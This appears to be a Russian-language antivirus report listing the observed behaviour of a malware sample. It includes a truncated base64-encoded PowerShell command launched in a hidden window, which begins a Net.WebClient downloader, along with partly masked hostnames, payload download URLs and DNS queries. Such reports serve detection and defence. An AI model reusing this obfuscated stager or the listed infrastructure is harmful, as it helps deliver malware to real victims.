Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAF8AMwBfADEANgA3AD0AKAAnAGkANQBfACcAKwAnADAAMAAzACcAKQA7ACQAQwA5ADcAXwA4ADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdwBfADgAXwA1AF8APQAoACcAaAAnACsAJwB0AH...
- 'sa###sramon.com':80
- 'di###ietnam.com':80
- 'hu###omains.com':443
- 'ev####viajes.com':80
- http://sa###sramon.com/examples/DwrtApdrm9/
- http://di###ietnam.com/wp-snapshots/yHL734TZk/
- 'hu###omains.com':443
- DNS ASK sa###sramon.com
- DNS ASK di###ietnam.com
- DNS ASK hu###omains.com
- DNS ASK bu####nsortium.com
- DNS ASK ef##ur.com
- DNS ASK ev####viajes.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABjAF8AMwBfADEANgA3AD0AKAAnAGkANQBfACcAKwAnADAAMAAzACcAKQA7ACQAQwA5ADcAXwA4ADQAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAdwBfADgAXwA1AF8APQAoACcAaAAnACsAJwB0AH...' (со скрытым окном)